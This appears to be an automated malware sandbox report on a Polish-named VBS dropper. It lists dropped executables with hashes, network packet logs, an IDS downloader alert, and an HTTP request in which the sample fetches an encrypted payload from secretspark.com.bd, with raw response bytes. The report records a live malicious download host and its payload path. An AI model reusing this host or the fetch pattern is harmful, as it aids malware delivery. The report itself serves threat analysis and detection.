                              File Type:data
                              Category:dropped
                              Size (bytes):257617
                              Entropy (8bit):1.246099982169644
                              Encrypted:false
                              SSDEEP:768:i0+x7CVav80s+kp4+TGeBEOLQviryD5YJ+i6LOmdmpBnVd5rl2ikTRlQlDZDCJN0:HHgo2O3/JQOBPiHdtO9T9t
                              MD5:35283846FDE3D302BF4504D08C68E427
                              SHA1:1889C48CBDCEBC6B10EC791494720AB420409897
                              SHA-256:FFA02D9E8099ED157EC815E544926014C529B9F51EE1788B8FD9968B3D799049
                              SHA-512:3C948EC1B4A530ADAB90E0AAF23C96DA49FC17FBCC3FF0B2DD9505C52CBFFDE3502CEAAD91E0D6534F6AFD332557CD90F5D60BD8C81560A4CBAF387B9B501C18
                              Malicious:false
                              Process:C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.97694153396788
                              Encrypted:false
                              SSDEEP:192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
                              MD5:D6F54D2CEFDF58836805796F55BFC846
                              SHA1:B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
                              SHA-256:F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
                              SHA-512:CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: mbdcKkZ3Ag.exe, Detection: malicious
• Filename: mbdcKkZ3Ag.exe, Detection: malicious
• Filename: mydreamudpate.hta, Detection: malicious
• Filename: Thermo Fisher RFQ_TFS-1507.xls, Detection: malicious
• Filename: BCXV7eBAlV.exe, Detection: malicious
• Filename: W9RpT8yapE.hta, Detection: malicious
• Filename: BCXV7eBAlV.exe, Detection: malicious
• Filename: AWB 9869692024 Clearance Doc.exe, Detection: malicious
• Filename: AWB 9869692024 Clearance Doc.exe, Detection: malicious
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\wscript.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Category:dropped
                              Size (bytes):830512
                              Entropy (8bit):7.741676173417688
                              Encrypted:false
                              SSDEEP:12288:2RfuTA5o9DiPijqt3zyBfYCZgCgkRWQsv4L64Ay7wltm4pMTiCltKYE/oVVqD3EG:AfuTVCt3zyeOfswGpm4OfeoVVqD3EG
                              MD5:C9B895E1253AA2B7147BE9B1E43F2DBD
                              SHA1:9EF2D92E0917B65DEE0A3D45872BE70992AC0882
                              SHA-256:C087B6B42EA2FA23894C1E4928D7EB6D312F4769635BFB9B22EF23A09444FA0D
                              SHA-512:B3493B7C9BA0E88319BF2A413C53873AB5CC8D9D1B7155FAE907D41FACD2A959FED68F5A84AE044406CC3F7143D9294C16274CE7E182B723CC55CDAE91399601
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 8%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..!smersmersmer8.asqmer8.csrmer8.ds|mersmdr.mer..asxmer...rrmer..gsrmerRichsmer........PE..L...?.*c.................n...*.......6............@.......................................@..........................................P...L..........X................................................................................................text...wl.......n.................. ..`.rdata...............r..............@..@.data...............................@....ndata...................................rsrc....L...P...N..................@..@................................................................................................................................................................................................................................................................................................................................................
                              File type:ASCII text, with very long lines (65399), with CRLF line terminators
                              Entropy (8bit):5.698921339858924
                              TrID:
                              • Visual Basic Script (13500/0) 100.00%
                              File name:Zeskanowana lista przedmiot#U00f3w nr 84329.vbs
                              File size:1'306'825 bytes
                              MD5:66ccc86e92b90555bef9ec7f4281cc8b
                              SHA1:8ef7f0bec3beb48df154b350cae7729df9e3cb74
                              SHA256:6e435f3a080733d5733beb10fd0d45f8530f9f5ebf8367ff1b4daf56d0106dc3
                              SHA512:89d225f726add2f44a33a8dd85ceb89a2fd6e526586e079ad62247659766337367888376f0d44b1eb936103ca0d499a59c6fb11a3aeb9fe3e60e7c72ed218b2e
                              SSDEEP:24576:aYQfEcXSFMuTGp2jdvB8S+QrShBYxfcFme3Frt0yOL09jFxzUA8cP51Xq:AccYMx7h6kuQq
                              TLSH:A055E198CF276E58A41711BC8A0B2B466CFC8DBC8269EFE8E55C345859D0E79133B3D4
                              File Content Preview:' Main script logic for processing Base64-encoded data....' Initialize the Base64 encoded string (placeholder)..Dim encodedBase64String..encodedBase64String = "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                              Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-25T17:20:28.125456+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49755 | 170.249.236.53 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 25, 2024 17:20:27.554327011 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:27.554461002 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:27.554644108 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:27.591285944 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:27.591363907 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:27.872036934 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:27.872275114 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:27.907449007 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:27.907536030 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:27.908664942 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:27.908906937 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:27.911031008 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:27.952291012 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.125596046 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.125972033 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.126032114 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.126302958 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.245718002 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.245727062 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.245795965 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.245906115 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.245906115 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.245933056 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.245950937 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.245950937 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.245999098 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.246033907 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.246085882 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.246097088 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.246114969 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.246201992 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.246201992 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.246279001 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.246279001 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.246345997 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366190910 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.366209030 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.366338968 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366338968 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366391897 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366431952 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366431952 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366447926 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.366481066 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366555929 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.366576910 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.366581917 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366595984 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.366684914 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366684914 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366734028 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366734028 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366734028 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366734028 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366781950 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366781950 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366831064 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.366831064 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.367007971 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.367023945 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.367153883 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.367153883 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.367202044 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.367202044 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.367300034 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.367300034 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.367314100 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.367451906 CEST | 49755 | 443 | 192.168.11.20 | 170.249.236.53
Sep 25, 2024 17:20:28.486103058 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
Sep 25, 2024 17:20:28.486145020 CEST | 443 | 49755 | 170.249.236.53 | 192.168.11.20
                              Sep 25, 2024 17:20:28.486308098 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486308098 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486334085 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486347914 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486423969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486423969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486495018 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486516953 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486529112 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486557961 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.486681938 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486682892 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486753941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486753941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486753941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.486802101 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487013102 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487035036 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487195969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487313032 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487323999 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487468958 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487694979 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487864971 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487888098 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.487947941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.487968922 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488017082 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488017082 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488065004 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488065004 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488065004 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488106012 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488291025 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488293886 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488293886 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488322020 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488322020 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488337040 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488419056 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488419056 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488466978 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488497972 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488514900 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488564968 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488571882 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.488663912 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488663912 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488663912 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488760948 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.488821983 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.608977079 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609051943 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609216928 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609216928 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609265089 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609286070 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609286070 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609286070 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609525919 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609769106 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609827042 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.609998941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.609998941 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610035896 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610055923 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610138893 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610193968 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610435963 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610488892 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610661030 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610661983 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610685110 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.610765934 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.610862017 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611215115 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611258030 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611403942 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611403942 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611490011 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611490011 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611521959 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611545086 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611686945 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.611845016 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.611891031 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612009048 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612009048 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612047911 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612065077 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612097025 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612097025 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612219095 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612237930 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612255096 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612319946 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612431049 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612431049 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612451077 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612481117 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612482071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612576008 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612624884 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612684011 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612730026 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612818956 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612818956 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612868071 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612893105 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.612919092 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612920046 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612920046 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612920046 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.612966061 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613064051 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613068104 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613090038 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613195896 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613195896 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613215923 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613244057 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613244057 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613295078 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613295078 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613326073 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613343954 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613343954 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613343954 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613399982 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613413095 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613440990 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613461018 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613538980 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613567114 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613600016 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613600969 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651037 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651991 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651991 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613651991 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613742113 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613802910 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613938093 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613938093 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.613974094 CEST44349755170.249.236.53192.168.11.20
                              Sep 25, 2024 17:20:28.613986015 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614034891 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614034891 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614131927 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614180088 CEST49755443192.168.11.20170.249.236.53
                              Sep 25, 2024 17:20:28.614202976 CEST44349755170.249.236.53192.168.11.20
                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                              Sep 25, 2024 17:20:26.996191978 CEST | 65098 | 53 | 192.168.11.20 | 1.1.1.1
                              Sep 25, 2024 17:20:27.549354076 CEST | 53 | 65098 | 1.1.1.1 | 192.168.11.20
                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                              Sep 25, 2024 17:20:26.996191978 CEST | 192.168.11.20 | 1.1.1.1 | 0xc3ea | Standard query (0) | secretspark.com.bd | A (IP address) | IN (0x0001) | false
                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                              Sep 25, 2024 17:20:27.549354076 CEST | 1.1.1.1 | 192.168.11.20 | 0xc3ea | No error (0) | secretspark.com.bd |  | 170.249.236.53 | A (IP address) | IN (0x0001) | false
                              • secretspark.com.bd
                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              0 | 192.168.11.20 | 49755 | 170.249.236.53 | 443 | 4004 | C:\Users\user\AppData\Local\Temp\temp_executable.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-25 15:20:27 UTC | 187 | OUT | GET /TkFvuYGGiJLZuopqvpi7.bin HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: secretspark.com.bd
                              Cache-Control: no-cache
                              2024-09-25 15:20:28 UTC | 404 | IN | HTTP/1.1 200 OK
                              Connection: close
                              content-type: application/octet-stream
                              last-modified: Wed, 25 Sep 2024 05:20:55 GMT
                              accept-ranges: bytes
                              content-length: 336448
                              date: Wed, 25 Sep 2024 15:20:28 GMT
                              server: LiteSpeed
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-09-25 15:20:28 UTC964INData Raw: d0 1d 47 3d c7 f3 82 74 12 08 2e 4d 6e 9c d1 49 3f 9a 45 f0 7b 86 01 72 78 22 2c 48 eb aa f6 8f b6 19 76 e0 9e 11 9e 07 e4 c3 30 42 ec d6 88 dc e5 84 87 fe a1 c1 61 3a 13 01 a5 72 e5 d1 0a 5b f7 fa 00 5b 71 cc 92 62 f9 ed a6 58 d8 85 8f d4 3b 17 71 93 16 e7 7a 97 ee 51 91 24 c9 9a 63 82 b4 3f e4 f8 50 89 cd 14 e2 63 b6 05 d9 12 b0 04 7b bb 6f 56 d9 a0 57 f9 89 0d 55 06 df 69 80 b5 11 b3 bd a3 51 22 d7 16 a5 a4 86 20 1a ff 85 0b a3 3f dc 46 79 59 77 66 bf e5 f5 56 78 eb 05 02 4b 82 6b 18 c0 52 f8 df b6 45 da 34 5b 74 d4 1e ea 3d ba d8 bc f1 76 72 2d 4b 89 80 2d 16 8c 7e 2a 59 f9 43 16 f7 11 a5 bd f4 c9 59 47 5e e8 e2 25 8c a4 34 68 51 da b0 b5 df 06 dc dc 98 89 a6 5a f6 f5 3f 38 30 3d e3 0f ae 9e ff 15 24 2c 7a d4 b3 01 50 e3 20 4e 5d 0a 7a 79 40 dd 75 24
                              Data Ascii: G=t.MnI?E{rx",Hv0Ba:r[[qbX;qzQ$c?Pc{oVWUiQ" ?FyYwfVxKkRE4[t=vr-K-~*YCYG^%4hQZ?80=$,zP N]zy@u$
